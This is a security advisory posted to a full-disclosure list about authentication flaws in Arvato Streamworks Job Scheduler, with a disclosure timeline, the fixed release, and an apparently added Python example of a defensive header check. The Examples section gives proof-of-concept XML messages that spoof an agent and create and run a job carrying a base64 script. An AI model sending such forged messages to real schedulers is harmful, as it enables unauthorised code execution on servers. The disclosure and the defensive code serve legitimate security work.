Message-ID: <20190114121745.Horde.D7mn_aRZeyNYS-MgQJwGZQ2@webmail.df.eu>
Date: Mon, 14 Jan 2019 12:17:45 +0100
From: Simon Bieber <sbieber@...uvera.de>
To: fulldisclosure@...lists.org
Subject: [FD] secuvera-SA-2016-01: Multiple authentication weaknesses in Arvato Systems Streamworks Job Scheduler


Affected Products
    Streamworks Job Scheduler Release 7 (older/newer releases have not
    been tested)

References
    Secuvera-SA-2016-01
    https://www.secuvera.de/advisories/secuvera-SA-2016-01.txt (used for
    updates)
    No CVE number could be assigned (vendor not listed under
    cve.mitre.org/data/board/archives/2016-01/msg00015.html)

Summary:
    Arvato Systems Streamworks Job Scheduler is a software product for
    automation purposes. It helps "to plan, maintain, control and monitor
    all of your automatable IT processes" (source: vendor product
    homepage). It consists of different types of services: an application
    server daemon and a processing server daemon that controls one or
    multiple agent daemons installed on the operating servers where the
    workload has to be done.

    During a penetration test at a customer's site three weaknesses
    concerning communication authentication were discovered:

    1) All agents installed on server systems use the same X.509
       certificate and private key that were issued by the vendor for
       authentication.

    2) The processing server component does not check received messages
       properly for authenticity.

    3) Agents installed on servers do not check received messages
       properly for authenticity.

    4) Agents and processing servers are vulnerable to the TLS Heartbleed
       attack (CVE-2014-0160, see
       https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0160)

Effect:
    1) If systems are compromised and the authentication material is
       stolen, all certificates have to be revoked and replaced. In
       addition, this expands the effect of 3) to the entire environment,
       not just single systems.

    2) An attacker with knowledge of the message syntax of the product and
       the authentication material is able to add, change or delete data
       within the Streamworks database.

    3) An attacker with knowledge of the message syntax of the product and
       the authentication material is able to create new jobs or execute
       available jobs on servers with agents installed that are located
       within the same network. This can lead to a complete loss of
       integrity, confidentiality or availability of the respective system
       or of the data stored/processed on it.

    4) An unauthenticated remote attacker is able to read content from
       system memory.

Vulnerable components and scripts:
    Streamworks Job Scheduler Processing Server Release 7.1
    Streamworks Job Scheduler Agent Release 7.1
    older releases have not been tested

Examples:
    In the following, a sample to exploit 2) and 3) is given. Replace the
    information within square brackets:

    2) By sending the following XML message to a processing server it is
    possible, as a proof of concept, to change the system information of
    a legitimately configured client. The system OS info was slightly
    changed:

    <AgentNotifyStarted ProcessId="7044" AgentVersion="3.1.36">
      <ComHeader Version="1.0">
        <MandatorCode>0100</MandatorCode>
        <MsgCreateTime>2016-02-24T10:26:11[YYYY]-[MM]-[DD]T[HH]:[MM]:[SS].745Z</MsgCreateTime>
        <MsgSendTime>[YYYY]-[MM]-[DD]T[HH]:[MM]:[SS].963Z</MsgSendTime>
        <SourceEndpoint Address="0.0.0.0" Port="30000" SysId="[Hostname of legitimate Client]" />
        <DestinationEndpoint Address="[FQDN of Processing server]" Port="9600" SysId="[FQDN of Processing server]" />
        <Sequence>0</Sequence>
      </ComHeader>
      <SystemInformation>
        <OsType>Windows</OsType>
        <OsInfo>Pentest Windows!</OsInfo>
        <OsLocale>de_DE.windows-1252</OsLocale>
      </SystemInformation>
      <KnownJobsList>
      </KnownJobsList>
      <FileTransferOptions Mode="ALL" BlockSize="0" />
      <Cli CliOptions="Enabled" />
    </AgentNotifyStarted>


  -------------


    3) By sending an XML message of the following type it is possible to
    create and execute a new job on a system:

    <ServerRequestStartJob>
      <ComHeader Version="0.1">
        <MandatorCode>0100</MandatorCode>
        <MsgCreateTime>[YYYY]-[MM]-[DD]T[HH]:[MM]:[SS].1061367Z</MsgCreateTime>
        <MsgSendTime>[YYYY]-[MM]-[DD]T[HH]:[MM]:[SS].1061367Z</MsgSendTime>
        <SourceEndpoint Address="[FQDN of processing server]" Port="9600" SysId="[FQDN of processing server]" />
        <DestinationEndpoint Address="[IP of Server with agent installed]" Port="30000" SysId="[Hostname of server with agent installed]" />
        <Sequence>1</Sequence>
        <MandatorId>0100</MandatorId>
      </ComHeader>
      <JobStartInfo>
        <JobInfo ServerJobId="118291965_1" ExecutionNo="1" PlanDate="[YYYY]-[MM]-[DD]" StreamName="[NewStreamName]" JobName="[NewJobName]" Run="1" />
        <UserName>[Username under which the agent should run the Script, e.g. LOCAL\System]</UserName>
        <Password>[Add Password of the user if needed]</Password>
        <UseUserProfile>true</UseUserProfile>
        <MainScript>[base64-encoded Script code, e.g. "cmVtDQpDOlxXaW5kb3dzXE5vdGVwYWQuZXhl" to start a notepad.exe on a Windows Host]</MainScript>
        <KeepJoblogDays>10</KeepJoblogDays>
      </JobStartInfo>
    </ServerRequestStartJob>
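Weaknesses 2) and 3) come down to the receiver trusting whatever the ComHeader claims. The following is an added example of the server-side check a processing server (or agent) could apply before acting on such a message; it is not Streamworks code. It assumes the receiver terminates TLS with a per-agent client certificate and passes the verified peer hostname in, that it knows the mandator code it serves, and a 5-minute clock-skew window; the sample message and hostnames are constructed.

```python
import xml.etree.ElementTree as ET
from datetime import datetime, timedelta, timezone

# Assumed (not from the advisory): the receiver has verified a per-agent
# client certificate and knows the peer's certificate hostname, and accepts
# at most this much skew between MsgCreateTime and its own clock.
MAX_CLOCK_SKEW = timedelta(minutes=5)

# Constructed sample in the AgentNotifyStarted layout shown in the advisory.
SAMPLE_MSG = """<AgentNotifyStarted ProcessId="7044" AgentVersion="3.1.36">
  <ComHeader Version="1.0">
    <MandatorCode>0100</MandatorCode>
    <MsgCreateTime>2019-01-14T11:00:00.745Z</MsgCreateTime>
    <MsgSendTime>2019-01-14T11:00:00.963Z</MsgSendTime>
    <SourceEndpoint Address="0.0.0.0" Port="30000" SysId="agent01.example.internal" />
    <DestinationEndpoint Address="sched.example.internal" Port="9600" SysId="sched.example.internal" />
    <Sequence>0</Sequence>
  </ComHeader>
  <SystemInformation><OsType>Windows</OsType><OsInfo>Pentest Windows!</OsInfo></SystemInformation>
</AgentNotifyStarted>"""

def parse_msg_time(value):
    # Timestamps look like 2016-02-24T10:26:11.745Z; drop the fraction and Z.
    return datetime.strptime(value.split(".")[0], "%Y-%m-%dT%H:%M:%S").replace(tzinfo=timezone.utc)

def check_header(xml_text, peer_sysid, expected_mandator, now, last_seq=-1):
    """Return (accepted, reason). The claimed SourceEndpoint must be the
    TLS-verified peer, the mandator must be the one served here, the
    timestamp must be fresh and Sequence must advance on this connection."""
    root = ET.fromstring(xml_text)
    hdr = root.find("ComHeader")
    if hdr is None:
        return False, "missing ComHeader"
    src = hdr.find("SourceEndpoint")
    if src is None or src.get("SysId", "").lower() != peer_sysid.lower():
        return False, "SourceEndpoint SysId does not match TLS peer identity"
    if hdr.findtext("MandatorCode") != expected_mandator:
        return False, "unexpected MandatorCode"
    try:
        created = parse_msg_time(hdr.findtext("MsgCreateTime", ""))
    except ValueError:
        return False, "malformed MsgCreateTime"
    if abs(now - created) > MAX_CLOCK_SKEW:
        return False, "MsgCreateTime outside accepted window"
    if int(hdr.findtext("Sequence", "-1")) <= last_seq:
        return False, "Sequence did not advance"
    return True, "accepted"
```

With the identity binding in place, a message that names a legitimate client in SysId but arrives over a connection authenticated as a different host is rejected before its payload is processed; the freshness and sequence checks additionally limit replay of captured messages.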

Solution:
    Install Streamworks Release 9.3
    (https://it.arvato.com/de/solutions/it-solutions/lp/streamworks-release-9-3.html
    - page available in German only)

Disclosure Timeline:
    2016/05/12 vulnerabilities discovered
    2016/05/30 vendor initially contacted
    2016/06/13 sales representative replied
    2016/06/14 technically responsible contact details received
    2016/07/01 technical personnel contacted, appointment to discuss
               findings made
    2016/07/11 submitted technical details to responsible personnel
    2016/07/12 responsible product manager replied. Committed to extend
               the disclosure timeline for comprehensible reasons. New
               disclosure timeline: end of September 2016
    2016/09/08 product manager replied, suggested a meeting to discuss fixes
    2016/09/27 meeting took place, half of the vulnerabilities were fixed.
               Timeline until disclosure extended again due to difficult
               changes. Disclosure timeline extended to end of April 2017
    2017/04/20 Contacted vendor again to remind of the near end of the
               disclosure timeline.
    2017/04/27 Reply and ongoing discussion about when the fix will be
               shipped.
    2017/05/20 Vendor replied that, due to customer experience, fewer
               releases were made. The fix will be shipped in the second
               quarter of 2018. Extended disclosure timeline until the end
               of June 2018.
    2018/04/03 Contacted vendor as reminder and to get a release ship date.
    2018/04/09 Vendor replied saying that the issues will be fixed within
               release 9.3 (shipped in the 2nd quarter of 2018). Final
               disclosure timeline: 2019/01/14, after a sufficient grace
               period for customers to install the fixed release
    2019/01/14 public advisory disclosure


Credits
	Simon Bieber, secuvera GmbH
	sbieber@...uvera.de
	https://www.secuvera.de

Disclaimer:
     All information is provided without warranty. The intent is to
     provide information to secure infrastructure and/or systems, not to
     enable attack or damage. Therefore secuvera shall not be liable for
     any direct or indirect damages that might be caused by using this
     information.
